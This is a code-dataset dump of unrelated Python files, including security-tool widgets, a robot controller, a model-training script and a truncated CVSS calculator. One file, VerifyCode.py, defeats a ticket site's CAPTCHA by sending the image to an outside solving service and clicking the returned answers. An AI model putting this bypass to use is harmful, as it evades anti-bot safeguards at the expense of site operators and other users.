hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b6d66846dd1a4e3402cad6fd04c432f519bd5085
| 625 |
py
|
Python
|
quant/observers/observer.py
|
doubleDragon/QuantBot
|
53a1d6c62ecece47bf777da0c0754430b706b7fd
|
[
"MIT"
] | 7 |
2017-10-22T15:00:09.000Z
|
2019-09-19T11:45:43.000Z
|
quant/observers/observer.py
|
doubleDragon/QuantBot
|
53a1d6c62ecece47bf777da0c0754430b706b7fd
|
[
"MIT"
] | 1 |
2018-01-19T16:19:40.000Z
|
2018-01-19T16:19:40.000Z
|
quant/observers/observer.py
|
doubleDragon/QuantBot
|
53a1d6c62ecece47bf777da0c0754430b706b7fd
|
[
"MIT"
] | 5 |
2017-12-11T15:10:29.000Z
|
2018-12-21T17:40:58.000Z
|
import abc
class Observer(object):
__metaclass__ = abc.ABCMeta
def __init__(self):
self.is_terminated = False
def terminate(self):
self.is_terminated = True
def update_balance(self):
pass
def update_other(self):
pass
def tick(self, depths):
pass
def begin_opportunity_finder(self, depths):
pass
def end_opportunity_finder(self):
pass
# Abs function
def opportunity(self, profit, volume, bprice, kask, sprice, kbid, perc, w_bprice, w_sprice,
base_currency="CNY", market_currency="BTC"):
pass
| 19.53125 | 95 | 0.6192 |
edefcfed10ffc0c1828ff2bf3352ad064f80ade4
| 2,221 |
py
|
Python
|
Packs/CortexXDR/Scripts/CortexXDRAdditionalAlertInformationWidget/CortexXDRAdditionalAlertInformationWidget.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CortexXDR/Scripts/CortexXDRAdditionalAlertInformationWidget/CortexXDRAdditionalAlertInformationWidget.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CortexXDR/Scripts/CortexXDRAdditionalAlertInformationWidget/CortexXDRAdditionalAlertInformationWidget.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from CommonServerPython import *
import traceback
''' COMMAND FUNCTION '''
def get_additonal_info() -> List[Dict]:
alerts = demisto.get(demisto.context(), 'PaloAltoNetworksXDR.OriginalAlert')
if not alerts:
raise DemistoException('Original Alert is not configured in context')
if not isinstance(alerts, list):
alerts = [alerts]
results = []
for alert in alerts:
alert_event = alert.get('event')
res = {'Alert Full Description': alert.get('alert_full_description'),
'Detection Module': alert.get('detection_modules'),
'Vendor': alert_event.get('vendor'),
'Provider': alert_event.get('cloud_provider'),
'Log Name': alert_event.get('log_name'),
'Event Type': demisto.get(alert_event, 'raw_log.eventType'),
'Caller IP': alert_event.get('caller_ip'),
'Caller IP Geo Location': alert_event.get('caller_ip_geolocation'),
'Resource Type': alert_event.get('resource_type'),
'Identity Name': alert_event.get('identity_name'),
'Operation Name': alert_event.get('operation_name'),
'Operation Status': alert_event.get('operation_status'),
'User Agent': alert_event.get('user_agent')}
results.append(res)
indicators = [res.get('Caller IP') for res in results]
indicators_callable = indicators_value_to_clickable(indicators)
for res in results:
res['Caller IP'] = indicators_callable.get(res.get('Caller IP'))
return results
''' MAIN FUNCTION '''
def main():
try:
results = get_additonal_info()
command_results = CommandResults(
readable_output=tableToMarkdown('Original Alert Additional Information', results,
headers=list(results[0].keys()) if results else None))
return_results(command_results)
except Exception as ex:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute AdditionalAlertInformationWidget. Error: {str(ex)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 38.293103 | 98 | 0.633949 |
b697c60fa81218c8991539315a6c9b2990ef5f64
| 2,232 |
py
|
Python
|
VerifyCode.py
|
Fzzfbu2/AutoGetTicket
|
bdc8f460cf70ce770ecf9b49ec498a7756742e14
|
[
"Apache-2.0"
] | 1 |
2020-01-20T09:55:37.000Z
|
2020-01-20T09:55:37.000Z
|
VerifyCode.py
|
Fzzfbu2/AutoGetTicket
|
bdc8f460cf70ce770ecf9b49ec498a7756742e14
|
[
"Apache-2.0"
] | null | null | null |
VerifyCode.py
|
Fzzfbu2/AutoGetTicket
|
bdc8f460cf70ce770ecf9b49ec498a7756742e14
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import pyautogui
import pyperclip
import requests
import win32api
import win32con
from selenium.webdriver import ActionChains
class VerifyCode:
def __init__(self, driver):
self.driver = driver
""" 目前这个接口时免费的。个人用没问题 """
self.verify_url = "http://littlebigluo.qicp.net:47720/"
def do_check(self):
""" 保存图片到本地 """
self.save_img()
time.sleep(1)
""" 选择验证码 """
self.move()
def save_img(self):
ele = self.driver.find_element_by_class_name("loginImg")
action = ActionChains(self.driver).move_to_element(ele)
action.context_click(ele).perform()
time.sleep(1)
# 按v
win32api.keybd_event(86, 0, 0, 0)
win32api.keybd_event(86, 0, win32con.KEYEVENTF_KEYUP, 0)
time.sleep(1)
""" 此文件路径要改成可配置,如果以后多用户,要考虑。 """
pic = "D:\\Developer\\Code\\mydemo\\mysite\\test.jpg"
pyperclip.copy(pic)
time.sleep(1)
pyautogui.hotkey("ctrlleft", "V")
""" 回车前,先把这个目录下的图片清理 """
if os.path.exists(pic):
os.remove(pic)
time.sleep(1)
pyautogui.press("enter")
def upload_img(self):
""" rb 以二进制方式读该文件 """
response = requests.post(self.verify_url, files={"pic_xxfile": open("test.jpg", "rb")})
time.sleep(2)
num = response.text.split("<B>")[1].split("<")[0]
print('验证码识别成功!图片位置:%s' % num)
try:
if int(num):
return [int(num)]
except ValueError:
num = list(map(int, num.split()))
return num
def move(self):
""" 调用接口上传返回结果 """
num = self.upload_img()
try:
ele = self.driver.find_element_by_class_name('loginImg')
for i in num:
if i <= 4:
ActionChains(self.driver).move_to_element_with_offset(ele, 40 + 72 * (i - 1), 73).click().perform()
else:
i -= 4
ActionChains(self.driver).move_to_element_with_offset(ele, 40 + 72 * (i - 1), 145).click().perform()
except:
print('元素不可选!')
| 31.43662 | 121 | 0.533154 |
1e812ad4c4d03ecc9ecd40daf83896fd58ecb93e
| 1,007 |
py
|
Python
|
source/pkgsrc/devel/py-txgithub/patches/patch-txgithub_scripts_gist.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/devel/py-txgithub/patches/patch-txgithub_scripts_gist.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/devel/py-txgithub/patches/patch-txgithub_scripts_gist.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-txgithub_scripts_gist.py,v 1.2 2017/10/01 09:52:19 wiz Exp $
Fix for python-3.x.
https://github.com/tomprince/txgithub/issues/13
--- txgithub/scripts/gist.py.orig 2017-09-30 20:47:17.806190554 +0000
+++ txgithub/scripts/gist.py
@@ -30,16 +30,16 @@ def postGist(reactor, token, files):
gistFiles['gistfile1'] = {"content": sys.stdin.read()}
response = yield api.gists.create(files=gistFiles)
- print response['html_url']
+ print(response['html_url'])
def run(reactor, *argv):
config = Options()
try:
config.parseOptions(argv[1:]) # When given no argument, parses sys.argv[1:]
- except usage.UsageError, errortext:
- print '%s: %s' % (argv[0], errortext)
- print '%s: Try --help for usage details.' % (argv[0])
+ except usage.UsageError as errortext:
+ print('%s: %s' % (argv[0], errortext))
+ print('%s: Try --help for usage details.' % (argv[0]))
sys.exit(1)
return postGist(reactor, **config)
| 34.724138 | 84 | 0.6286 |
bf6168cb7acba96b551b6b3820dc17bea6066f1d
| 104 |
py
|
Python
|
insomniac/extra_features/action_dm.py
|
shifenis/Insomniac
|
7c9d572b83c29049bc3075073be5549fe821a739
|
[
"MIT"
] | 533 |
2020-06-01T10:40:11.000Z
|
2022-03-29T17:05:50.000Z
|
insomniac/extra_features/action_dm.py
|
shifenis/Insomniac
|
7c9d572b83c29049bc3075073be5549fe821a739
|
[
"MIT"
] | 399 |
2020-06-01T22:01:55.000Z
|
2022-03-29T20:39:29.000Z
|
insomniac/extra_features/action_dm.py
|
shifenis/Insomniac
|
7c9d572b83c29049bc3075073be5549fe821a739
|
[
"MIT"
] | 166 |
2020-06-01T21:51:52.000Z
|
2022-03-12T14:14:44.000Z
|
from insomniac import activation_controller
exec(activation_controller.get_extra_feature('action_dm'))
| 26 | 58 | 0.875 |
44cf94c5fdf98f871538f11ac67edf71ae02d34a
| 7,480 |
py
|
Python
|
code/motor/robot.py
|
dieterpl/iDogstra
|
62ee246763e107335b9caf0a4f96239fa0953234
|
[
"MIT"
] | null | null | null |
code/motor/robot.py
|
dieterpl/iDogstra
|
62ee246763e107335b9caf0a4f96239fa0953234
|
[
"MIT"
] | null | null | null |
code/motor/robot.py
|
dieterpl/iDogstra
|
62ee246763e107335b9caf0a4f96239fa0953234
|
[
"MIT"
] | null | null | null |
import time
try:
import brickpi3
except Exception:
print("WARNING: no brickpi3 found (not running on raspberry pi?)")
brickpi3 = None
try:
import getch
except Exception:
print("WARNING: no getch found")
getch = None
import sys
if brickpi3 is not None:
class Robot (brickpi3.BrickPi3):
def __init__(self, speed=100):
super(Robot, self).__init__()
self.movement_state = 'stop'
self.default_speed = speed
self.current_speed = 0
def rotate(self, speed=None):
if speed<0:
self.left(speed*-1)
elif speed > 0:
self.right(speed)
else:
self.stop()
def forward(self, speed=None):
if speed is None:
print('using default speed')
speed = self.default_speed
self.set_motor_power(self.PORT_A + self.PORT_D, speed)
self.current_speed = speed
self.movement_state = 'forward'
def backward(self, speed=None):
if speed is None:
print('using default speed')
speed = self.default_speed
self.set_motor_power(self.PORT_A + self.PORT_D, -speed)
self.current_speed = speed
self.movement_state = 'backward'
def left(self, speed=None):
if speed is None:
print('using default speed')
speed = self.default_speed
self.set_motor_power(self.PORT_A, speed)
self.set_motor_power(self.PORT_D, -speed)
self.current_speed = speed
self.movement_state = 'left'
def right(self, speed=None):
if speed is None:
print('using default speed')
speed = self.default_speed
self.set_motor_power(self.PORT_A, -speed)
self.set_motor_power(self.PORT_D, speed)
self.current_speed = speed
self.movement_state = 'right'
def stop(self):
while(self.current_speed > 0):
self.current_speed -= 1
if self.movement_state == 'forward':
self.forward(self.current_speed)
elif self.movement_state == 'backward':
self.backward(self.current_speed)
elif self.movement_state == 'left':
self.left(self.current_speed)
elif self.movement_state == 'right':
self.right(self.current_speed)
time.sleep(0.01)
self.movement_state = 'stop'
def __move_by_bpdegree(self, direction, bpdegree):
# optional for setting rotation speed
BP.set_motor_limits(BP.PORT_A + BP.PORT_D, 50, 200)
# reset motor positions
self.offset_motor_encoder(BP.PORT_A, BP.get_motor_encoder(BP.PORT_A))
self.offset_motor_encoder(BP.PORT_D, BP.get_motor_encoder(BP.PORT_D))
port_A_pos = self.get_motor_encoder(self.PORT_A)
port_D_pos = self.get_motor_encoder(self.PORT_D)
port_A_new_pos = port_A_pos + bpdegree
port_D_new_pos = port_D_pos + bpdegree
print("curr portA: %s curr portD: %s" % (port_A_pos, port_D_pos))
print("next portA: %s next portD: %s" % (port_A_new_pos, port_D_new_pos))
if direction == 'left':
self.set_motor_position(self.PORT_A, port_A_new_pos)
self.set_motor_position(self.PORT_D, -port_D_new_pos)
self.movement_state = 'left'
elif direction == 'right':
self.set_motor_position(self.PORT_A, -port_A_new_pos)
self.set_motor_position(self.PORT_D, port_D_new_pos)
self.movement_state = 'right'
def move_by_degree(self, direction, degree):
bpdegree = self.degree_to_bpdegree(degree)
if direction == 'left_by_degree':
self.move_by_bpdegree('left', bpdegree)
elif direction == 'right_by_degree':
self.move_by_bpdegree('right', bpdegree)
def bpdegree_to_degree(self, bpdegree):
return (bpdegree * 1.66) / 10
def degree_to_bpdegree(self, degree):
return (degree * 0.6) * 10
def __move_for_duration(self, duration, speed=None):
if speed is None:
speed = self.default_speed
if direction == 'left':
self.__move_for_duration(self.left, duration, speed)
elif direction == 'right':
self.__move_for_duration(self.right, duration, speed)
elif direction == 'forward':
self.__move_for_duration(self.forward, duration, speed)
elif direction == 'backward':
self.__move_for_duration(self.backward, duration, speed)
time.sleep(duration)
self.stop()
def __move_with_key(self, key):
if key == '' and self.movement_state != 'stop':
self.stop()
elif key == 'w':
self.forward()
elif key == 'a':
self.left()
elif key == 'd':
self.right()
elif key == 's':
if self.movement_state == 'stop':
self.backward()
else:
self.stop()
def drive_with_keys(self):
try:
while True:
char = getch.getch()
self.__move_with_key(char)
time.sleep(0.01)
except KeyboardInterrupt:
self.reset_all()
def cli(self):
directions = ['left', 'right', 'forward', 'backward']
directions_by_degree = ['left_by_degree', 'right_by_degree']
try:
while True:
left_motor = self.get_motor_encoder(self.PORT_A)
right_motor = self.get_motor_encoder(self.PORT_D)
print("Left motor: %6d - Right motor: %6d" % (left_motor, right_motor))
inp = input("> ")
operation = inp.split(' ')
command = operation[0]
if command in directions:
speed = int(operation[1])
duration = float(operation[2])
self.__move_for_duration(command, duration, speed)
elif command in directions_by_degree:
degree = int(operation[1])
self.move_by_degree(command, degree)
elif command == 'info':
self.get_info()
else:
print('No such action')
except KeyboardInterrupt:
self.reset_all()
"""
call this module with > python3 robot.py speed to drive the
brickpi with WASD and a specific speed
otherwise > python3 robot.py will open the command line interface:
commands:
left speed duration
right speed duration
forward speed duration
backward speed duration
left_by_degree degree
right_by_degree degree
"""
if __name__ == '__main__':
args = sys.argv
if len(args) >= 2:
speed = int(args[1])
BP = Robot(speed)
BP.drive_with_keys()
else:
speed = 80
BP = Robot(speed)
BP.cli()
| 32.951542 | 91 | 0.541176 |
787acf14f59696e8f16cf6760a73268d0a139e38
| 1,295 |
py
|
Python
|
Packs/MalwareInvestigationAndResponse/Scripts/InvestigationDetailedSummaryToTable/InvestigationDetailedSummaryToTable.py
|
jrauen/content
|
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
|
[
"MIT"
] | null | null | null |
Packs/MalwareInvestigationAndResponse/Scripts/InvestigationDetailedSummaryToTable/InvestigationDetailedSummaryToTable.py
|
jrauen/content
|
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
|
[
"MIT"
] | 40 |
2022-03-03T07:34:00.000Z
|
2022-03-31T07:38:35.000Z
|
Packs/MalwareInvestigationAndResponse/Scripts/InvestigationDetailedSummaryToTable/InvestigationDetailedSummaryToTable.py
|
jrauen/content
|
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
|
[
"MIT"
] | null | null | null |
from CommonServerPython import *
TACTIC = 'Tactic'
STATUS = 'Status'
BOOL_TO_DESCRIPTION = {True: '🔴 Detected', False: '🟢 Not Detected'}
def table_command(context: dict) -> CommandResults:
if not context:
return CommandResults(
readable_output='### Waiting on entries\n'
'When `InvestigationDetailedSummaryParse` is finished, its results will appear here.'
)
table_values: list[dict] = []
for tactic, techniques in context.items():
table_values.append({TACTIC: f'**{tactic.upper()}**', STATUS: ''})
for technique, found in techniques.items():
table_values.append({TACTIC: technique, STATUS: BOOL_TO_DESCRIPTION[found]})
return CommandResults(readable_output=tableToMarkdown('', table_values, headers=[TACTIC, STATUS]))
def main():
try:
context = json.loads(
demisto.incident().get('CustomFields', {}).get('malwaredetailedinvestigationsummary') or '{}')
return_results(table_command(context))
except Exception as ex:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute InvestigationDetailedSummaryToTable. Error: {str(ex)}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 37 | 113 | 0.664865 |
01e07ad8588df02b2b29517992a57bb9371ff315
| 10,984 |
py
|
Python
|
training.py
|
NiksMer/ManiBERT
|
00e726ccd3d1b465c614c72b0b79c5286d0e68b4
|
[
"MIT"
] | null | null | null |
training.py
|
NiksMer/ManiBERT
|
00e726ccd3d1b465c614c72b0b79c5286d0e68b4
|
[
"MIT"
] | null | null | null |
training.py
|
NiksMer/ManiBERT
|
00e726ccd3d1b465c614c72b0b79c5286d0e68b4
|
[
"MIT"
] | null | null | null |
# %%
# Setup
## Packages
import pandas as pd
import numpy as np
import torch
from transformers import RobertaForSequenceClassification, TrainingArguments, Trainer, RobertaTokenizer, RobertaConfig
from datasets import load_metric, load_dataset
from sklearn.metrics import precision_recall_fscore_support, accuracy_score, classification_report
from tqdm import tqdm
## Cuda
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
n_gpu = torch.cuda.device_count()
####### Model Config ############
## Modelname
model_to_use = "roberta-base"
trained_model_name = "ManiBERT_v2"
## Max Sequence Length
max_lengh_parameter = 512
## Anzahl Labels
label_count = 56
## Anzahl Epochs
if n_gpu > 1 :
epoch_count = 5
else:
epoch_count = 1
## Batch Size
if n_gpu > 1 :
batch_size = 16
else:
batch_size = 4
## warmup_steps
warmup_ratio_parameter = 0.05
## weight_decay
weight_decay_parameter = 0.1
## learning_rate
learning_rate_parameter = 5e-05
## Log file
log_name = '01_Report/log_manibert.json'
## Report
validatipon_report_name = '01_Report/validation_report_manibert.txt'
test_report_name = '01_Report/test_report_manibert.txt'
####### Data Config ############
## Train Data
train_data = "00_Data_intern/01_data/trainingsdaten_manibert_27022022.csv"
## Valid Data
valid_data = "00_Data_intern/01_data/validierungsdaten_manibert_27022022.csv"
## Test Data
test_data = "00_Data_intern/01_data/testdaten_manibert_27022022.csv"
## Delimeter
delimeter_char = ","
## Label Names
label_names = [
"Foreign Special Relationships: Positive",
"Foreign Special Relationships: Negative",
"Anti-Imperialism",
"Military: Positive",
"Military: Negative",
"Peace",
"Internationalism: Positive",
"European Community/Union or Latin America Integration: Positive",
"Internationalism: Negative",
"European Community/Union or Latin America Integration: Negative",
"Freedom and Human Rights",
"Democracy",
"Constitutionalism: Positive",
"Constitutionalism: Negative",
"Decentralisation: Positive",
"Centralisation: Positive",
"Governmental and Administrative Efficiency",
"Political Corruption",
"Political Authority",
"Free Market Economy",
"Incentives: Positive",
"Market Regulation",
"Economic Planning",
"Corporatism/ Mixed Economy",
"Protectionism: Positive",
"Protectionism: Negative",
"Economic Goals",
"Keynesian Demand Management",
"Economic Growth: Positive",
"Technology and Infrastructure: Positive",
"Controlled Economy",
"Nationalisation",
"Economic Orthodoxy",
"Marxist Analysis: Positive",
"Anti-Growth Economy and Sustainability",
"Environmental Protection",
"Culture: Positive",
"Equality: Positive",
"Welfare State Expansion",
"Welfare State Limitation",
"Education Expansion",
"Education Limitation",
"National Way of Life: Positive",
"National Way of Life: Negative",
"Traditional Morality: Positive",
"Traditional Morality: Negative",
"Law and Order",
"Civic Mindedness: Positive",
"Multiculturalism: Positive",
"Multiculturalism: Negative",
"Labour Groups: Positive",
"Labour Groups: Negative",
"Agriculture and Farmers",
"Middle Class and Professional Groups",
"Underprivileged Minority Groups",
"Non-economic Demographic Groups"
]
## Config Dicts
id2label_parameter = {
"0": "Foreign Special Relationships: Positive",
"1": "Foreign Special Relationships: Negative",
"2": "Anti-Imperialism",
"3": "Military: Positive",
"4": "Military: Negative",
"5": "Peace",
"6": "Internationalism: Positive",
"7": "European Community/Union or Latin America Integration: Positive",
"8": "Internationalism: Negative",
"9": "European Community/Union or Latin America Integration: Negative",
"10": "Freedom and Human Rights",
"11": "Democracy",
"12": "Constitutionalism: Positive",
"13": "Constitutionalism: Negative",
"14": "Decentralisation: Positive",
"15": "Centralisation: Positive",
"16": "Governmental and Administrative Efficiency",
"17": "Political Corruption",
"18": "Political Authority",
"19": "Free Market Economy",
"20": "Incentives: Positive",
"21": "Market Regulation",
"22": "Economic Planning",
"23": "Corporatism/ Mixed Economy",
"24": "Protectionism: Positive",
"25": "Protectionism: Negative",
"26": "Economic Goals",
"27": "Keynesian Demand Management",
"28": "Economic Growth: Positive",
"29": "Technology and Infrastructure: Positive",
"30": "Controlled Economy",
"31": "Nationalisation",
"32": "Economic Orthodoxy",
"33": "Marxist Analysis: Positive",
"34": "Anti-Growth Economy and Sustainability",
"35": "Environmental Protection",
"36": "Culture: Positive",
"37": "Equality: Positive",
"38": "Welfare State Expansion",
"39": "Welfare State Limitation",
"40": "Education Expansion",
"41": "Education Limitation",
"42": "National Way of Life: Positive",
"43": "National Way of Life: Negative",
"44": "Traditional Morality: Positive",
"45": "Traditional Morality: Negative",
"46": "Law and Order",
"47": "Civic Mindedness: Positive",
"48": "Multiculturalism: Positive",
"49": "Multiculturalism: Negative",
"50": "Labour Groups: Positive",
"51": "Labour Groups: Negative",
"52": "Agriculture and Farmers",
"53": "Middle Class and Professional Groups",
"54": "Underprivileged Minority Groups",
"55": "Non-economic Demographic Groups"
}
label2id_parameter = {
"Foreign Special Relationships: Positive": 0,
"Foreign Special Relationships: Negative": 1,
"Anti-Imperialism": 2,
"Military: Positive": 3,
"Military: Negative": 4,
"Peace": 5,
"Internationalism: Positive": 6,
"European Community/Union or Latin America Integration: Positive": 7,
"Internationalism: Negative": 8,
"European Community/Union or Latin America Integration: Negative": 9,
"Freedom and Human Rights": 10,
"Democracy": 11,
"Constitutionalism: Positive": 12,
"Constitutionalism: Negative": 13,
"Decentralisation: Positive": 14,
"Centralisation: Positive": 15,
"Governmental and Administrative Efficiency": 16,
"Political Corruption": 17,
"Political Authority": 18,
"Free Market Economy": 19,
"Incentives: Positive": 20,
"Market Regulation": 21,
"Economic Planning": 22,
"Corporatism/ Mixed Economy": 23,
"Protectionism: Positive": 24,
"Protectionism: Negative": 25,
"Economic Goals": 26,
"Keynesian Demand Management": 27,
"Economic Growth: Positive": 28,
"Technology and Infrastructure: Positive": 29,
"Controlled Economy": 30,
"Nationalisation": 31,
"Economic Orthodoxy": 32,
"Marxist Analysis: Positive": 33,
"Anti-Growth Economy and Sustainability": 34,
"Environmental Protection": 35,
"Culture: Positive": 36,
"Equality: Positive": 37,
"Welfare State Expansion": 38,
"Welfare State Limitation": 39,
"Education Expansion": 40,
"Education Limitation": 41,
"National Way of Life: Positive": 42,
"National Way of Life: Negative": 43,
"Traditional Morality: Positive": 44,
"Traditional Morality: Negative": 45,
"Law and Order": 46,
"Civic Mindedness: Positive": 47,
"Multiculturalism: Positive": 48,
"Multiculturalism: Negative": 49,
"Labour Groups: Positive": 50,
"Labour Groups: Negative": 51,
"Agriculture and Farmers": 52,
"Middle Class and Professional Groups": 53,
"Underprivileged Minority Groups": 54,
"Non-economic Demographic Groups": 55
}
####### Functions ############
def tokenize_function(examples):
return tokenizer(examples["text"], padding="max_length", truncation=True)
## Neue Metrics function: https://huggingface.co/transformers/v3.0.2/training.html#trainer
def compute_metrics(pred):
labels = pred.label_ids
preds = pred.predictions.argmax(-1)
precision, recall, f1_micro, _ = precision_recall_fscore_support(labels, preds, average='micro')
precision2, recall3, f1_macro, _ = precision_recall_fscore_support(labels, preds, average='macro')
precision3, recall4, f1_weighted, _ = precision_recall_fscore_support(labels, preds, average='weighted')
acc = accuracy_score(labels, preds)
return {
'accuracy': acc,
'f1-micro': f1_micro,
'f1-macro': f1_macro,
'f1-weighted': f1_weighted,
'precision': precision,
'recall': recall
}
# %%
# Daten laden
raw_datasets = load_dataset('csv',data_files={'train':[train_data],'validation':[valid_data],'test': [test_data]},delimiter=delimeter_char)
# %%
# Tokenizer
RobertaTokenizer.from_pretrained(
model_to_use,
model_max_length=max_lengh_parameter
).save_pretrained(trained_model_name)
tokenizer = RobertaTokenizer.from_pretrained(
model_to_use,
model_max_length=max_lengh_parameter
)
tokenized_datasets = raw_datasets.map(tokenize_function, batched=True)
# %%
# Trainer Argumente
training_args = TrainingArguments(
output_dir=trained_model_name,
warmup_ratio=warmup_ratio_parameter,
weight_decay=weight_decay_parameter,
learning_rate=learning_rate_parameter,
fp16 = True,
evaluation_strategy="epoch",
num_train_epochs=epoch_count,
per_device_train_batch_size=batch_size,
overwrite_output_dir=True,
per_device_eval_batch_size=batch_size,
save_strategy="no",
logging_dir='logs',
logging_strategy= 'steps',
logging_steps=10,
push_to_hub=True,
hub_strategy="end")
# %%
# Modell laden
model = RobertaForSequenceClassification.from_pretrained(
model_to_use,
num_labels=label_count,
id2label=id2label_parameter,
label2id=label2id_parameter
)
# %%
# Trainer definieren
trainer = Trainer(
model=model,
args=training_args,
train_dataset=tokenized_datasets["train"],
eval_dataset=tokenized_datasets["validation"],
compute_metrics=compute_metrics,
)
# %%
# Trainieren
trainer.train()
# %%
# Evaluate for Classification Report
## Validation
predictions, labels, _ = trainer.predict(tokenized_datasets["validation"])
predictions = np.argmax(predictions, axis=1)
with open(validatipon_report_name,'w',encoding='utf-8') as f:
f.truncate(0) # Vorher File leeren
f.write(classification_report(y_pred=predictions,y_true=labels,target_names=label_names))
# %%
# Evaluate for Classification Report
## Test
predictions, labels, _ = trainer.predict(tokenized_datasets["test"])
predictions = np.argmax(predictions, axis=1)
with open(test_report_name,'w',encoding='utf-8') as f:
f.truncate(0) # Vorher File leeren
f.write(classification_report(y_pred=predictions,y_true=labels,target_names=label_names))
# %%
# Abspeichern
## Log speichern
with open(log_name, 'w',encoding='utf-8') as f:
f.truncate(0) # Vorher File leeren
for obj in trainer.state.log_history:
f.write(str(obj)+'\n')
## Modell speichern
trainer.save_model(trained_model_name)
tokenizer.save_pretrained(trained_model_name, push_to_hub=True)
# %%
| 30.342541 | 140 | 0.711307 |
171ce1b9a2152f3d9fb2b482b3a9dc061afe08d1
| 11,310 |
py
|
Python
|
Packs/CVSS/Scripts/CVSSCalculator/CVSSCalculator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CVSS/Scripts/CVSSCalculator/CVSSCalculator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CVSS/Scripts/CVSSCalculator/CVSSCalculator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
import math
from typing import Dict, Any
def round_up(n):
if n is None:
return None
int_input = int(n * 100000)
if (int_input % 10000) == 00:
return int_input / 100000.0
else:
return math.floor((int_input / 10000) + 1) / 10.0
def main():
args = demisto.args()
version = args.get('version', '3.1')
vector_string = f"CVSS:{version}/"
values_map_options: Dict[str, Dict[str, Dict[str, Any]]] = {
"3.0": {
"AV": {
"X": None,
"N": 0.85,
"A": 0.62,
"L": 0.55,
"P": 0.2,
},
"AC": {
"X": None,
"L": 0.77,
"H": 0.44
},
"PR": {
"X": None,
"N": 0.85,
"L": {
"C": 0.68,
"U": 0.62
},
"H": {
"C": 0.5,
"U": 0.27
}
},
"UI": {
"X": None,
"N": 0.85,
"R": 0.62
},
"CIA": {
"X": None,
"N": 0,
"H": 0.56,
"L": 0.22,
},
"E": {
"X": 1,
"H": 1,
"F": 0.97,
"P": 0.94,
"U": 0.91
},
"RL": {
"X": 1,
"U": 1,
"W": 0.97,
"T": 0.96,
"O": 0.95
},
"RC": {
"X": 1,
"C": 1,
"R": 0.96,
"U": 0.92
},
"CIAR": {
"X": 1,
"H": 1.5,
"M": 1,
"L": 0.5
}
},
"3.1": {
"AV": {
"X": None,
"N": 0.85,
"A": 0.62,
"L": 0.55,
"P": 0.2,
},
"AC": {
"X": None,
"L": 0.77,
"H": 0.44
},
"PR": {
"X": None,
"N": 0.85,
"L": {
"C": 0.68,
"U": 0.62
},
"H": {
"C": 0.5,
"U": 0.27
}
},
"UI": {
"X": None,
"N": 0.85,
"R": 0.56
},
"CIA": {
"X": None,
"N": 0,
"H": 0.56,
"L": 0.22,
},
"E": {
"X": 1,
"H": 1,
"F": 0.97,
"P": 0.94,
"U": 0.91
},
"RL": {
"X": 1,
"U": 1,
"W": 0.97,
"T": 0.96,
"O": 0.95
},
"RC": {
"X": 1,
"C": 1,
"R": 0.96,
"U": 0.92
},
"CIAR": {
"X": 1,
"H": 1.5,
"M": 1,
"L": 0.5
}
}
}
version = args.get('version')
values_map = values_map_options[version]
value_list = list()
for k, v in args.items():
